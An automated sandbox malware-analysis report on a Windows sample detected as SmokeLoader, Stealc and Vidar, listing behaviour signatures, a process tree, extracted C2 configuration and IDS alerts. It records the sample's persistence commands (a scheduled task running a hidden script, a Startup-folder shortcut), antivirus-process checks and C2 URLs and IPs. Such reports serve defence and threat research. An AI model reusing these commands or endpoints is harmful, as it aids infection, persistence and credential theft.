Edit tour

Windows Analysis Report
h8jGj6Qe78.exe

Overview

General Information

Sample name:	h8jGj6Qe78.exe renamed because original name is a hash value
Original sample name:	fd192fb05e0cd219b14c5bf345f33cfb.exe
Analysis ID:	1502474
MD5:	fd192fb05e0cd219b14c5bf345f33cfb
SHA1:	fbadb3784b44770045f6c84f3cc2db34e1b6863a
SHA256:	0599250511b7b3ec63303fa14e98edef3092d61614e07106cf274bd6d43b2451
Tags:	exeStealc
Infos:

Detection

CryptOne, SmokeLoader, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected CryptOne packer

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

h8jGj6Qe78.exe (PID: 7716 cmdline: "C:\Users\user\Desktop\h8jGj6Qe78.exe" MD5: FD192FB05E0CD219B14C5BF345F33CFB)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

329C.exe (PID: 7284 cmdline: C:\Users\user\AppData\Local\Temp\329C.exe MD5: 09607648B95315F78A147FCAC628E63D)

cmd.exe (PID: 7396 cmdline: "C:\Windows\System32\cmd.exe" /k move Teach Teach.bat & Teach.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7512 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2504 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 4248 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4340 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3684 cmdline: cmd /c md 795933 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 1860 cmdline: findstr /V "tagsnegotiationthreadadobe" Literature MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7384 cmdline: cmd /c copy /b ..\Church + ..\Activity + ..\Yahoo + ..\Census + ..\Mario + ..\Postcards + ..\Vessel + ..\Vhs + ..\Maps + ..\Convenience + ..\Comment + ..\Shift z MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Burn.pif (PID: 2104 cmdline: Burn.pif z MD5: 18CE19B57F43CE0A5AF149C96AECC685)

choice.exe (PID: 4888 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cmd.exe (PID: 5236 cmdline: cmd /c schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7528 cmdline: schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7700 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & echo URL="C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DFA6.exe (PID: 1396 cmdline: C:\Users\user\AppData\Local\Temp\DFA6.exe MD5: 17D51083CCB2B20074B1DC2CAC5BEA36)

svchost015.exe (PID: 708 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)

wscript.exe (PID: 5252 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

SwiftServe.scr (PID: 5684 cmdline: "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

RegAsm.exe (PID: 3896 cmdline: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

ewggbbh (PID: 8020 cmdline: C:\Users\user\AppData\Roaming\ewggbbh MD5: FD192FB05E0CD219B14C5BF345F33CFB)

wscript.exe (PID: 7444 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

SwiftServe.scr (PID: 2828 cmdline: "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

ewggbbh (PID: 2208 cmdline: C:\Users\user\AppData\Roaming\ewggbbh MD5: FD192FB05E0CD219B14C5BF345F33CFB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Threatname: Vidar

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1937968230.0000000000848000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1214a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1712342116.000000000088A000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12352:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001A.00000002.2426601330.0000000003019000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000003.00000002.1937842003.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: DFA6.exe PID: 1396	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: DFA6.exe PID: 1396	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 708	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: svchost015.exe PID: 708	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 708	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost015.exe PID: 708	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: RegAsm.exe PID: 3896	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
29.0.svchost015.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
29.0.svchost015.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, ProcessId: 3896, ProcessName: RegAsm.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5236, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F, ProcessId: 7528, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js", ProcessId: 7444, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ewggbbh, CommandLine: C:\Users\user\AppData\Roaming\ewggbbh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ewggbbh, NewProcessName: C:\Users\user\AppData\Roaming\ewggbbh, OriginalFileName: C:\Users\user\AppData\Roaming\ewggbbh, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\ewggbbh, ProcessId: 8020, ProcessName: ewggbbh

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe, ProcessId: 3896, ProcessName: RegAsm.exe

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\795933\Burn.pif, ProcessId: 2104, TargetFilename: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\795933\Burn.pif, ProcessId: 2104, TargetFilename: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js", ProcessId: 7444, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7700, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:24.310806+0200
SID:	2803304
Severity:	3
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:28:03.102175+0200
SID:	2039103
Severity:	1
Source Port:	56172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:22.017920+0200
SID:	2803304
Severity:	3
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:28:07.729876+0200
SID:	2039103
Severity:	1
Source Port:	56175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:28:07.729876+0200
SID:	2851815
Severity:	1
Source Port:	56175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 91.202.233.158 - Destination IP: 192.168.2.4

Timestamp:	2024-09-01T18:28:12.185731+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	56177
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:39.923038+0200
SID:	2039103
Severity:	1
Source Port:	56155
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:53.916895+0200
SID:	2039103
Severity:	1
Source Port:	56166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:30.577828+0200
SID:	2039103
Severity:	1
Source Port:	56189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:25.041054+0200
SID:	2039103
Severity:	1
Source Port:	56188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:48.876870+0200
SID:	2039103
Severity:	1
Source Port:	56192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:37.409195+0200
SID:	2039103
Severity:	1
Source Port:	56153
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:55.293384+0200
SID:	2039103
Severity:	1
Source Port:	56193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:48.594093+0200
SID:	2039103
Severity:	1
Source Port:	56161
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:55.377152+0200
SID:	2039103
Severity:	1
Source Port:	56167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:55.377152+0200
SID:	2851815
Severity:	1
Source Port:	56167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Generic AsyncRAT Style SSL Cert - Source IP: 45.202.35.38 - Destination IP: 192.168.2.4

Timestamp:	2024-09-01T18:29:25.592712+0200
SID:	2035595
Severity:	1
Source Port:	56001
Destination Port:	56180
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:18.223191+0200
SID:	2039103
Severity:	1
Source Port:	56187
Destination Port:	80
Protocol:	TCP
